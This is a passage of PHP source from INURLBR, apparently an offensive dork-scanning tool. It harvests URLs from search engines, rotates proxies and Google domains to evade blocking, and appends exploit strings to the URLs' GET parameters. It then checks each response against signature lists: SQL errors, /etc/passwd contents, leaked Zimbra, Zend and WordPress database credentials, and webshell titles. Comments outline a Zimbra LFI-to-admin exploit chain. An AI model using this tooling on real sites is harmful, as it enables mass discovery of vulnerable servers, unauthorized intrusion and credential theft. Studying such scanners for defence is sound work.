  2268. if (__validateOptions('3,4', $_SESSION['config']['tipoerro'])) {
  2269.  
  2270. $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
  2271. }
  2272.  
  2273. /* [*]SHELLSHOCK
  2274. * (CVE-2014-6271, CVE-2014-6277,
  2275. * CVE-2014-6278, CVE-2014-7169,
  2276. * CVE-2014-7186, CVE-2014-7187)
  2277. * is a vulnerability in GNU's bash shell that gives attackers access
  2278. * to run remote commands on a vulnerable system. */
  2279. $validation['SHELLSHOCK-01'] = '99887766555';
  2280.  
  2281. /* [*]LOCAL FILE INCLUSION
  2282. * Local File Inclusion (also known as LFI) is the process of including
  2283. * files, that are already locally present on the server, through the
  2284. * exploiting of vulnerable inclusion procedures implemented in the
  2285. * application.
  2286. * https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion */
  2287. $validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
  2288. $validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
  2289. $validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
  2290.  
  2291. /* [*]ZIMBRA MAIL
  2292. * Zimbra 0day exploit / Privilegie escalation via LFI
  2293. * This script exploits a Local File Inclusion in
  2294. * /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
  2295. * which allows us to see localconfig.xml
  2296. * that contains LDAP root credentials wich allow us to make requests in
  2297. * /service/admin/soap API with the stolen LDAP credentials to create user
  2298. * with administration privlegies
  2299. * and gain acces to the Administration Console.
  2300. * https://www.exploit-db.com/exploits/30085/ */
  2301. $validation['ZIMBRA-WEB-MAIL-01'] = 'zimbra_user';
  2302. $validation['ZIMBRA-WEB-MAIL-02'] = 'zimbra_ldap_password';
  2303. $validation['ZIMBRA-WEB-MAIL-03'] = 'ldap_replication_password';
  2304. $validation['ZIMBRA-WEB-MAIL-04'] = 'ldap_root_password';
  2305. $validation['ZIMBRA-WEB-MAIL-05'] = 'ldap_nginx_password';
  2306. $validation['ZIMBRA-WEB-MAIL-06'] = 'mailboxd_keystore_password';
  2307. $validation['ZIMBRA-WEB-MAIL-07'] = 'zimbra_mysql_password';
  2308. $validation['ZIMBRA-WEB-MAIL-08'] = 'mysql_root_password';
  2309. $validation['ZIMBRA-WEB-MAIL-10'] = 'mailboxd_truststore_password';
  2310. $validation['ZIMBRA-WEB-MAIL-11'] = 'ldap_postfix_password';
  2311. $validation['ZIMBRA-WEB-MAIL-12'] = 'ldap_amavis_password';
  2312.  
  2313. /* [*]ZEND FRAMEWORK
  2314. * Zend-Framework Full Info Disclosure
  2315. * The username and password of the database may be obtained trough
  2316. * the "application.ini" file
  2317. * https://www.exploit-db.com/exploits/29921/ */
  2318. $validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
  2319. $validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
  2320. $validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
  2321. $validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
  2322. $validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
  2323.  
  2324. /* [*]CMS WORDPRESS
  2325. * As the name suggests, if the web application doesn’t check the file
  2326. * name required by the user, any malicious user can exploit this
  2327. * vulnerability to download sensitive files from the server.
  2328. * Arbitrary File Download vulnerability file wp-config.php
  2329. * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
  2330. * http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure */
  2331. $validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  2332. $validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
  2333. $validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  2334. $validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
  2335.  
  2336. /* [*]ERROR MARIADB
  2337. * MariaDB is a drop-in replacement for MySQL.
  2338. * MariaDB strives to be the logical choice for database professionals
  2339. * looking for a robust, scalable, and reliable SQL server. To accomplish
  2340. * this, the MariaDB Foundation work closely and cooperatively with the
  2341. * larger community of users and developers in the true spirit of Free
  2342. * and open source software, and release software in a manner that
  2343. * balances predictability with reliability.
  2344. * https://mariadb.org/en/about/ */
  2345. $validation['MARIADB-01'] = 'MariaDB server version for the right syntax';
  2346.  
  2347. /* [*]ERROR MYSQL
  2348. * MySQL is a database management system (DBMS), which uses the SQL
  2349. * (Structured Query Language, English Structured Query Language) as
  2350. * interface. It is currently one of the most popular databases, with
  2351. * more than 10 million installations worldwide
  2352. * https://www.mysql.com/
  2353. * http://php.net/manual/en/security.database.sql-injection.php
  2354. */
  2355. $validation['MYSQL-AND-MARIADB'] = 'You have an error in your SQL syntax;';
  2356. $validation['MYSQL-03'] = 'Warning: mysql_';
  2357. $validation['MYSQL-04'] = 'function.mysql';
  2358. $validation['MYSQL-05'] = 'MySQL result index';
  2359. $validation['MYSQL-07'] = 'MySQL Error';
  2360. $validation['MYSQL-08'] = 'MySQL ODBC';
  2361. $validation['MYSQL-09'] = 'MySQL Driver';
  2362. $validation['MYSQL-10'] = 'mysqli.query';
  2363. $validation['MYSQL-11'] = 'num_rows';
  2364. $validation['MYSQL-12'] = 'mysql error:';
  2365. $validation['MYSQL-13'] = 'supplied argument is not a valid MySQL result resource';
  2366. $validation['MYSQL-14'] = 'on MySQL result index';
  2367. $validation['MYSQL-15'] = 'Error Executing Database Query';
  2368. $validation['MYSQL-01'] = 'mysql_';
  2369.  
  2370. /* [*]ERROR MICROSOFT
  2371. * MICROSOFT TECHNOLOGY
  2372. * http://www.microsoft.com/pt-br/server-cloud/products/sql-server/
  2373. * https://products.office.com/pt-br/access
  2374. * https://www.owasp.org/index.php/Testing_for_SQL_Server */
  2375. $validation['MICROSOFT-01'] = 'Microsoft JET Database';
  2376. $validation['MICROSOFT-02'] = 'ADODB.Recordset';
  2377. $validation['MICROSOFT-03'] = '500 - Internal server error';
  2378. $validation['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
  2379. $validation['MICROSOFT-05'] = 'Unclosed quotes';
  2380. $validation['MICROSOFT-06'] = 'ADODB.Command';
  2381. $validation['MICROSOFT-07'] = 'ADODB.Field error';
  2382. $validation['MICROSOFT-08'] = 'Microsoft VBScript';
  2383. $validation['MICROSOFT-09'] = 'Microsoft OLE DB Provider for SQL Server';
  2384. $validation['MICROSOFT-10'] = 'Unclosed quotation mark';
  2385. $validation['MICROSOFT-11'] = 'Microsoft OLE DB Provider for Oracle';
  2386. $validation['MICROSOFT-14'] = 'Active Server Pages error';
  2387. $validation['MICROSOFT-15'] = 'OLE/DB provider returned message';
  2388. $validation['MICROSOFT-16'] = 'OLE DB Provider for ODBC';
  2389. $validation['MICROSOFT-17'] = "error '800a0d5d'";
  2390. $validation['MICROSOFT-18'] = "error '800a000d'";
  2391. $validation['MICROSOFT-19'] = 'Unclosed quotation mark after the character string';
  2392. $validation['MICROSOFT-20'] = '[Microsoft][SQL Server Native Client 11.0][SQL Server]';
  2393. $validation['MICROSOFT-21'] = 'Warning: odbc_';
  2394.  
  2395. /* #[*]ERROR ORACLE
  2396. * - DBMS currently marketed by Oracle, who was born in 1979 and was
  2397. * the first relational BD sold worldwide;
  2398. * - Latest version: Oracle Database 11G;
  2399. * http://www.oracle.com/br/solutions/midsize/oracle-products/database/index.html
  2400. * https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf */
  2401. $validation['ORACLE-01'] = 'ORA-00921: unexpected end of SQL command';
  2402. $validation['ORACLE-02'] = 'ORA-01756';
  2403. $validation['ORACLE-03'] = 'ORA-';
  2404. $validation['ORACLE-04'] = 'Oracle ODBC';
  2405. $validation['ORACLE-05'] = 'Oracle Error';
  2406. $validation['ORACLE-06'] = 'Oracle Driver';
  2407. $validation['ORACLE-07'] = 'Oracle DB2';
  2408. $validation['ORACLE-08'] = 'error ORA-';
  2409. $validation['ORACLE-09'] = 'SQL command not properly ended';
  2410.  
  2411. /* #[*]ERROR DB2
  2412. * DB2 is a database system Relational Manager (SGDBR) produced by IBM.
  2413. * There are different versions of DB2 running from a simple PDA |
  2414. * handheld, even in powerful mainframes and run on servers based on
  2415. * Unix, Windows, or Linux.
  2416. * http://www-01.ibm.com/software/br/db2/lowerdatabasecosts/
  2417. * https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#DB2_Escaping */
  2418. $validation['DB2-01'] = 'DB2 ODBC';
  2419. $validation['DB2-02'] = 'DB2 error';
  2420. $validation['DB2-03'] = 'DB2 Driver';
  2421.  
  2422. /* #[*]ERROR ODBC
  2423. * ODBC (acronym for Open Database Connectivity) is a standard for
  2424. * access to managers of database systems (DBMS).
  2425. * https://support.office.com/pt-br/article/Administrar-fontes-de-dados-ODBC-b19f856b-5b9b-48c9-8b93-07484bfab5a7
  2426. * https://www.exploit-db.com/papers/12975/ */
  2427. $validation['ODBC-01'] = 'ODBC SQL';
  2428. $validation['ODBC-02'] = 'ODBC DB2';
  2429. $validation['ODBC-03'] = 'ODBC Driver';
  2430. $validation['ODBC-04'] = 'ODBC Error';
  2431. $validation['ODBC-05'] = 'ODBC Microsoft Access';
  2432. $validation['ODBC-06'] = 'ODBC Oracle';
  2433. $validation['ODBC-07'] = 'ODBC Microsoft Access Driver';
  2434.  
  2435. /* #[*]ERROR POSTGRESQL
  2436. * PostgreSQL is an object-relational database management system
  2437. * (ORDBMS), developed as an open source project.
  2438. * http://www.postgresql.org.br/old/
  2439. * https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL */
  2440. $validation['POSTGRESQL-01'] = 'Warning: pg_';
  2441. $validation['POSTGRESQL-02'] = 'PostgreSql Error:';
  2442. $validation['POSTGRESQL-03'] = 'function.pg';
  2443. $validation['POSTGRESQL-04'] = 'Supplied argument is not a valid PostgreSQL result';
  2444. $validation['POSTGRESQL-05'] = 'PostgreSQL query failed: ERROR: parser: parse error';
  2445. $validation['POSTGRESQL-06'] = 'pg_';
  2446.  
  2447. /* #[*]ERROR SYBASE
  2448. * Sybase (NYSE: SY), an SAP company, is a software company that
  2449. * produces services and products related to information management,
  2450. * mobility, messaging, development tools, and data warehousing and
  2451. * OLAP data.
  2452. * https://www.owasp.org/index.php?search=SYBASE&title=Special%3ASearch&go=Go */
  2453. $validation['SYBASE-01'] = 'Warning: sybase_';
  2454. $validation['SYBASE-02'] = 'function.sybase';
  2455. $validation['SYBASE-03'] = 'Sybase result index';
  2456. $validation['SYBASE-04'] = 'Sybase Error:';
  2457. $validation['SYBASE-05'] = 'Sybase: Server message:';
  2458. $validation['SYBASE-06'] = 'sybase_';
  2459. $validation['SYBASE-07'] = '[Sybase][ODBC Driver]:';
  2460.  
  2461. /* #[*]ERROR JBOSSWEB
  2462. * JBoss Web Server is an enterprise ready web server designed for
  2463. * medium and large applications, based on Tomcat.
  2464. * JBoss Web a component of the JBoss Application Server, there are
  2465. * no more standalone version of JBoss Web you need the Application
  2466. * Server to get the Servlet/JSP container.
  2467. * http://jbossweb.jboss.org/
  2468. * http://www.rapid7.com/db/search?utf8=%E2%9C%93&q=JBoss+&t=a */
  2469. $validation['JBOSSWEB-01'] = 'java.sql.SQLSyntaxErrorException: ORA-';
  2470. $validation['JBOSSWEB-02'] = 'org.springframework.jdbc.BadSqlGrammarException:';
  2471. $validation['JBOSSWEB-03'] = 'javax.servlet.ServletException:';
  2472. $validation['JBOSSWEB-04'] = 'java.lang.NullPointerException';
  2473.  
  2474. /* #[*]ERROR JDBC
  2475. * Java Database Connectivity or JDBC is a set of classes and
  2476. * interfaces (API) written in Java that make sending SQL statements
  2477. * for any relational database
  2478. * http://www.oracle.com/technetwork/java/javase/jdbc/index.html
  2479. * https://www.owasp.org/index.php/Preventing_SQL_Injection_in_Java */
  2480. $validation['JDBC_CFM-01'] = 'Error Executing Database Query';
  2481. $validation['JDBC_CFM-02'] = 'SQLServer JDBC Driver';
  2482. $validation['JDBC_CFM-03'] = 'JDBC SQL';
  2483. $validation['JDBC_CFM-04'] = 'JDBC Oracle';
  2484. $validation['JDBC_CFM-05'] = 'JDBC MySQL';
  2485. $validation['JDBC_CFM-06'] = 'JDBC error';
  2486. $validation['JDBC_CFM-07'] = 'JDBC Driver';
  2487.  
  2488. /* #[*]JAVA INFINITYDB
  2489. * InfinityDB is an all-Java embedded database engine that is deployed
  2490. * in handheld devices, on servers, on workstations, and in distributed
  2491. * settings. */
  2492. $validation['JAVA-INFINITYDB-01'] = 'java.io.IOException: InfinityDB';
  2493.  
  2494. /* #[*]ERROR PHP
  2495. * The PHP development team announces the immediate availability of
  2496. * PHP 5.4.40. 14 security-related bugs were fixed in this release,
  2497. * including CVE-2014-9709, CVE-2015-2301, CVE-2015-2783, CVE-2015-1352.
  2498. * All PHP 5.4 users are encouraged to upgrade to this version.
  2499. * http://php.net/ */
  2500. $validation['ERRORPHP-01'] = 'Warning: include';
  2501. $validation['ERRORPHP-02'] = 'Fatal error: include';
  2502. $validation['ERRORPHP-03'] = 'Warning: require';
  2503. $validation['ERRORPHP-04'] = 'Fatal error: require';
  2504. $validation['ERRORPHP-05'] = 'ADODB_Exception';
  2505. $validation['ERRORPHP-06'] = 'Warning: include(';
  2506. $validation['ERRORPHP-07'] = 'Warning: require_once(';
  2507. $validation['ERRORPHP-08'] = 'function.include';
  2508. $validation['ERRORPHP-09'] = 'Disallowed Parent Path';
  2509. $validation['ERRORPHP-10'] = 'function.require';
  2510. $validation['ERRORPHP-11'] = 'Warning: main(';
  2511. $validation['ERRORPHP-12'] = 'Warning: session_start()';
  2512. $validation['ERRORPHP-13'] = 'Warning: getimagesize()';
  2513. $validation['ERRORPHP-16'] = 'Warning: array_merge()';
  2514. $validation['ERRORPHP-17'] = 'Warning: preg_match()';
  2515. $validation['ERRORPHP-18'] = 'GetArray()';
  2516. $validation['ERRORPHP-19'] = 'FetchRow()';
  2517. $validation['ERRORPHP-20'] = 'Warning: preg_';
  2518. $validation['ERRORPHP-21'] = 'Warning: ociexecute()';
  2519. $validation['ERRORPHP-22'] = 'Warning: ocifetchstatement()';
  2520. $validation['ERRORPHP-23'] = 'PHP Warning:';
  2521.  
  2522. /* #[*]ERROR ASP
  2523. * The ASP (Active Server Pages), also known as Classic ASP today, is a
  2524. * framework of basic libraries (and not a language) for processing of
  2525. * scripting languages on the server side to generate dynamic content on
  2526. * the Web
  2527. * http://www.asp.net/ */
  2528. $validation['ERRORASP-01'] = 'Version Information: Microsoft .NET Framework';
  2529. $validation['ERRORASP-04'] = 'ASP.NET is configured to show verbose error messages';
  2530. $validation['ERRORASP-05'] = 'BOF or EOF';
  2531. $validation['ERRORASP-06'] = 'Unclosed quotation mark';
  2532. $validation['ERRORASP-06'] = 'Error converting data type varchar to numeric';
  2533.  
  2534. /* #[*]ERROR LUA
  2535. * Lua is a scripting language imperative, procedural, small, reflective
  2536. * and light, designed to expand applications in general, to be an
  2537. * extensible language (which connects parts of a program made in more
  2538. * than one language)
  2539. * http://www.lua.org/ */
  2540. $validation['ERRORLUA-01'] = 'LuaPlayer ERROR:';
  2541. $validation['ERRORLUA-02'] = 'CGILua message';
  2542. $validation['ERRORLUA-03'] = 'Lua error';
  2543.  
  2544. #[*]ERROR INDEFINIDOS
  2545. $validation['INDEFINITE-01'] = 'Incorrect syntax near';
  2546. $validation['INDEFINITE-02'] = 'Fatal error';
  2547. $validation['INDEFINITE-04'] = 'Invalid Querystring';
  2548. $validation['INDEFINITE-05'] = 'Input string was not in a correct format';
  2549. $validation['INDEFINITE-06'] = 'An illegal character has been found in the statement';
  2550.  
  2551. #[*]SHELL SCRIPT backdoored.
  2552. $validation['SHELL-01'] = 'c99shell</title>';
  2553. $validation['SHELL-02'] = 'C99Shell v';
  2554. $validation['SHELL-03'] = '<form method="POST" action="cfexec.cfm">';
  2555. $validation['SHELL-05'] = '<input type=text name=".CMD" size=45 value=';
  2556. $validation['SHELL-05'] = '<title>awen asp.net webshell</title>';
  2557. $validation['SHELL-06'] = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>";
  2558. $validation['SHELL-07'] = 'JSP Backdoor Reverse Shell';
  2559. $validation['SHELL-08'] = 'Simple CGI backdoor by DK';
  2560. $validation['SHELL-09'] = 'execute command: <input type="text" name="c">';
  2561. $validation['SHELL-10'] = 'Execute Shell Command';
  2562. $validation['SHELL-11'] = 'r57shell</title>';
  2563. $validation['SHELL-12'] = '<title>r57Shell';
  2564. $validation['SHELL-13'] = 'heroes1412';
  2565. $validation['SHELL-14'] = 'MyShell';
  2566. $validation['SHELL-15'] = 'PHP Shell';
  2567. $validation['SHELL-16'] = 'PHPShell';
  2568. $validation['SHELL-17'] = 'REMVIEW TOOLS';
  2569. $validation['SHELL-18'] = '<title>iTSecTeam</title>';
  2570. $validation['SHELL-19'] = 'JSP Backdoor Reverse Shell';
  2571. $validation['SHELL-20'] = '<title>* ernealizm * </title>';
  2572. $validation['SHELL-21'] = '<title>JSP Shell</title>';
  2573. $validation['SHELL-22'] = '<title>KNULL Shell</title>';
  2574. $validation['SHELL-23'] = '<title>.+- WSO.+</title>';
  2575. $validation['SHELL-24'] = '<title>SST Sheller !</title>';
  2576. $validation['SHELL-25'] = '<title>SyRiAn Sh3ll';
  2577. $validation['SHELL-26'] = '<title>Mini Php Shell';
  2578. $validation['SHELL-27'] = '<title>ASPX Shell</title>';
  2579. $validation['SHELL-28'] = '<title>ZoRBaCK Connect</title>';
  2580. $validation['SHELL-29'] = '<title>.+Ani-Shell.+</title>';
  2581. $validation['SHELL-30'] = '<title>Stored Procedure Execute</title>';
  2582. $validation['SHELL-31'] = '<title>:: www.h4ckcity.org :: Coded By 2MzRp & LocalMan ::</title>';
  2583. $validation['SHELL-32'] = '<title>PhpShell 2.0</title>';
  2584. $validation['SHELL-33'] = '<title>.+NTDaddy.+</title>';
  2585. $validation['SHELL-34'] = '<title>PHP-Terminal';
  2586.  
  2587. $_SESSION['config']['cms-check-resultado'] = (!is_null($_SESSION['config']['cms-check'])) ? __SimpleCheckCMS($html_) : NULL;
  2588. }
  2589.  
  2590. if (!is_null($_SESSION['config']['regexp'])) {
  2591.  
  2592. preg_match_all("#\b{$_SESSION['config']['regexp']}#i", $html_, $match);
  2593. __plus();
  2594. return (isset($match[0][0]) && !empty($match[0][0]) ? " regular expression->{$_SESSION['config']['regexp']} - " . $match[0][0] . " FOUD! " : NULL);
  2595. } else {
  2596.  
  2597. foreach ($validation as $campo => $valor) {
  2598.  
  2599. __plus();
  2600. if (__validateBD($html_, $validation[$campo], $campo)) {
  2601.  
  2602. __plus();
  2603. return(" {$campo} - VALUE: {$validation[$campo]}");
  2604. }
  2605. }
  2606. }
  2607. }
  2608.  
  2609. ################################################################################
  2610. #CHECK ERROR 2 HTML INSIDE######################################################
  2611. ################################################################################
  2612.  
  2613. function __validateBD($html_, $verificar, $bd) {
  2614.  
  2615. return (strstr($html_, $verificar)) ? $bd : NULL;
  2616. }
  2617.  
  2618. ################################################################################
  2619. #FORMAT URL#####################################################################
  2620. ################################################################################
  2621.  
  2622. function __mountURLExploit($_url) {
  2623.  
  2624. $_url = explode("=", trim(urldecode($_url)));
  2625. $get = max(array_keys($_url));
  2626. $get_ = $_url[$get];
  2627. return implode("=", str_replace($get_, $get_ . ((!is_null($_SESSION['config']['exploit-get'])) ? $_SESSION['config']['exploit-get'] : NULL), $_url));
  2628. }
  2629.  
  2630. ################################################################################
  2631. #FILTER HTML URLs ALL THE RETURN OF seekers#####################################
  2632. ################################################################################
  2633.  
  2634. function __filterURL($html, $op = NULL) {
  2635.  
  2636. $reg = !strstr($op, 'GOOGLE') ? "#\b(href=\"|src=\"|value=\")(.*?)(\")#si" :
  2637. "#\b(href=\"|src=\"|value=\"http[s]?://|href=\"|src=\"|value=\"ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
  2638. $html = str_replace('href="/url?q=', 'href="', $html);
  2639.  
  2640. if (strstr($html, '.google.com/sorry/IndexRedirect?continue=https://www.google.com.') && $_SESSION['config']['persist'] <= $_SESSION["config"]['google_attempt'][1]) {
  2641.  
  2642. print_r("{$_SESSION["c1"]}[ INFO ][ ERROR ]{$_SESSION["c2"]} GOOGLE LOCKED!{$_SESSION["c0"]}\n");
  2643. $randHost = __dominioGoogleRandom();
  2644. $_SESSION["config"]['google_attempt'][1] ++;
  2645. __pageEngine($_SESSION["config"]["conf_array_tmp"], "GOOGLE - {$randHost}", "https://{$randHost}/search?q=[DORK]&num=1500&btnG=Search&pws=1", $_SESSION["config"]["dork_tmp"], NULL, 0, 0, 1);
  2646. } else {
  2647. $_SESSION["config"]["google_attempt"][1] = 0;
  2648. preg_match_all($reg, $html, $html);
  2649. return (array_filter(array_unique($html[0])));
  2650. }
  2651. }
  2652.  
  2653. ################################################################################
  2654. #FILTER HTML URLs ALL THE RETURN OF GOOGLE API##################################
  2655. ################################################################################
  2656.  
  2657. function __filterURLJson($html) {
  2658.  
  2659. $html = json_decode($html, true);
  2660. $allresponseresults = $html['responseData']['results'];
  2661. foreach ($allresponseresults as $value) {
  2662. $tmp[] = $value['url'];
  2663. }
  2664. return (array_filter(array_unique($tmp)));
  2665. }
  2666.  
  2667. ################################################################################
  2668. #Filtering the repeated emails #################################################
  2669. ################################################################################
  2670.  
  2671. function __filterEmailsRepeated() {
  2672.  
  2673. echo "\n\n{$_SESSION["c1"]}|[ INFO ][ Filtering the repeated emails the file {$_SESSION['config']['arquivo_output']} ]{$_SESSION["c0"]}\n";
  2674. $array = __openFile($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output'], 1);
  2675. if (is_array($array)) {
  2676.  
  2677. unlink($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output']);
  2678. unset($_SESSION['config']['resultado_valores']);
  2679. foreach ($array as $value) {
  2680.  
  2681. __saveValue($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output'], $value, 2) . __plus();
  2682. $_SESSION['config']['resultado_valores'] .= "{$value}\n";
  2683. }
  2684. } else {
  2685.  
  2686. echo "\n\n{$_SESSION["c1"]}|[ ERROR ][ ERROR EMAILS FILTERING ]{$_SESSION["c0"]}\n";
  2687. }
  2688. }
  2689.  
  2690. ################################################################################
  2691. #COUNTING PROCESS END URLS / vuln AND SHOWING THE URLS / vuln###################
  2692. ################################################################################
  2693.  
  2694. function __exitProcess() {
  2695.  
  2696. $file = !is_null($_SESSION['config']['arquivo_output']) ? $_SESSION['config']['arquivo_output'] : NULL;
  2697. $file_all = !is_null($_SESSION['config']['arquivo_output_all']) ? $_SESSION['config']['arquivo_output_all'] : NULL;
  2698. (($_SESSION['config']['extrai-email']) ? __filterEmailsRepeated() : NULL);
  2699. $cont = count(explode("\n", $_SESSION['config']['resultado_valores'])) - 1;
  2700. echo "\n\n{$_SESSION["c1"]}[ INFO ] [ Shutting down ]{$_SESSION["c0"]}";
  2701. echo "\n{$_SESSION["c1"]}[ INFO ] [ End of process INURLBR at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c0"]}";
  2702. echo "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c0"]}{$_SESSION["c16"]}[ TOTAL FILTERED VALUES ]::{$_SESSION["c1"]} [ {$cont} ]{$_SESSION["c0"]}";
  2703. echo!is_null($file) ? "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c16"]}[ OUTPUT FILE ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file} ]{$_SESSION["c0"]}" : NULL;
  2704. echo!is_null($file_all) ? "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c16"]}[ OUTPUT FILE ALL ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file_all} ]{$_SESSION["c0"]}" : NULL;
  2705. echo "\n{$_SESSION["c1"]}|_________________________________________________________________________________________{$_SESSION["c0"]}\n";
  2706.  
  2707. print_r(!$_SESSION['config']['extrai-email'] ? $_SESSION['config']['resultado_valores'] : NULL);
  2708.  
  2709. echo "\n{$_SESSION["c1"]}\_________________________________________________________________________________________/{$_SESSION["c0"]}\n";
  2710. __getOut("\n");
  2711. }
  2712.  
  2713. ################################################################################
  2714. #CASE URLS FILTER AND VALIDATING URL VALID######################################
  2715. ################################################################################
  2716.  
  2717. function __subProcess($resultado = NULL) {
  2718.  
  2719. $resultado_ = is_array($resultado) ? array_unique(array_filter($resultado)) : $resultado;
  2720. if (isset($resultado_)) {
  2721.  
  2722. foreach ($resultado_ as $result) {
  2723.  
  2724. $result = __filterURLTAG($result);
  2725. $result_ = __validateURL($result) ? $result : NULL;
  2726. $blacklist_ = (!is_null($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $_SESSION["config"]['blacklist']) : $_SESSION["config"]['blacklist'];
  2727. __plus();
  2728.  
  2729. if (not_isnull_empty($result_) && !__validateOptions($blacklist_, $result_, 1)) {
  2730.  
  2731. $_SESSION["config"]["totas_urls"].= "{$result_}\n";
  2732. }
  2733. }
  2734. }
  2735. }
  2736.  
  2737. ################################################################################
  2738. #DEBUGAR VALORES E PROCESSOS####################################################
  2739. ################################################################################
  2740.  
  2741. function __debug($valor, $op = NULL) {
  2742.  
  2743. return isset($_SESSION["config"]["debug"]) && __validateOptions($_SESSION["config"]["debug"], $op) ? "\n[ INFO ][ FUNCTION ]=>{$valor['function']}[ DEBUG ] => \n" . print_r($valor['debug']) . "\n" : NULL;
  2744. }
  2745.  
  2746. ################################################################################
  2747. #TIME TO PROCESS SEC############################################################
  2748. ################################################################################
  2749.  
  2750. function __timeSec($camp, $value = NULL) {
  2751.  
  2752. echo!is_null($_SESSION['config'][$camp]) && !empty($_SESSION['config'][$camp]) ? "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ TIME SEC/DELAY ]::{$_SESSION["c1"]}{ {$_SESSION["c8"]}[ {$_SESSION['config'][$camp]} ]{$_SESSION["c1"]} }{$_SESSION["c0"]}{$value}" : NULL;
  2753. !is_null($_SESSION['config'][$camp]) ? sleep($_SESSION['config'][$camp]) : NULL;
  2754. }
  2755.  
  2756. ################################################################################
  2757. #SEARCH ENGINE CONFIGURATION####################################################
  2758. ################################################################################
  2759.  
  2760. function __pageEngine($confArray, $motorNome, $motorURL, $dork, $postDados, $pagStart, $pagLimit, $pagIncrement, $pagStart2 = NULL, $pagIncrement2 = NULL) {
  2761.  
  2762. __plus();
  2763.  
  2764. echo ("\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ ENGINE ]::{$_SESSION["c1"]}[ {$motorNome} ]{$_SESSION["c0"]}\n");
  2765. echo (!is_null($_SESSION['config']['max_pag']) ? ("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ LIMIT PAG ]::{$_SESSION["c1"]}[ {$_SESSION['config']['max_pag']} ]{$_SESSION["c0"]}\n") : NULL);
  2766. $http_proxy = not_isnull_empty($_SESSION['config']['proxy-http-file']) || not_isnull_empty($_SESSION['config']['proxy-http']) ? __proxyHttpRandom() : NULL;
  2767. echo not_isnull_empty($http_proxy) ? "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ HTTP_PROXY ]:: {$http_proxy}{$_SESSION["c0"]}\n" : NULL;
  2768. echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ SEARCHING ]:: {$_SESSION["c0"]}\n";
  2769.  
  2770. $contMaxpg = 0;
  2771. $pagStart2_ = $pagStart2;
  2772. $pagStart3_ = $pagStart2;
  2773. while ($pagStart <= $pagLimit) {
  2774.  
  2775. echo "{$_SESSION["c1"]}-{$_SESSION["c16"]}[{$_SESSION["c12"]}:::{$_SESSION["c16"]}]{$_SESSION["c0"]}";
  2776. __plus();
  2777. $_proxy = not_isnull_empty($confArray["list_proxy_rand"]) && !not_isnull_empty($_SESSION['config']['time-proxy']) ? $confArray["list_proxy_rand"] : $_SESSION["config"]["proxy"];
  2778. $proxy = not_isnull_empty($_SESSION['config']['proxy-file']) && not_isnull_empty($_SESSION['config']['time-proxy']) ? __timeSecChangeProxy($confArray["list_proxy_file"]) : $_proxy;
  2779.  
  2780. $murl[0] = str_replace("[DORK]", $dork, $motorURL);
  2781. $murl[0] = str_replace("[PAG]", $pagStart, $murl[0]);
  2782. $murl[0] = str_replace("[PAG2]", $pagStart2_, $murl[0]);
  2783. $murl[0] = str_replace("[PAG3]", $pagStart3_, $murl[0]);
  2784. $murl[0] = str_replace("[RANDOM]", base64_encode(intval(rand() % 255) . intval(rand() % 2553333)), $murl[0]);
  2785. $murl[0] = str_replace("[IP]", intval(rand() % 255) . "." . intval(rand() % 255) . "." . intval(rand() % 255) . "." . intval(rand() % 255), $murl[0]);
  2786.  
  2787.  
  2788. $postDados = !is_null($postDados) ? __convertUrlQuery(parse_url(urldecode($murl[0]), PHP_URL_QUERY)) : NULL;
  2789.  
  2790. __debug(array('debug' => "[ URL ENGINE ]{$http_proxy}{$murl[0]}", 'function' => '__pageEngine'), 1);
  2791.  
  2792. $request__ = __request_info($http_proxy . $murl[0], $proxy, $postDados);
  2793. __plus();
  2794. $tmp_url = ($motorNome == 'GOOGLE API') ? __filterURLJson($request__["corpo"]) : __filterURL($request__["corpo"], $motorNome);
  2795. __subProcess($tmp_url);
  2796. __plus();
  2797.  
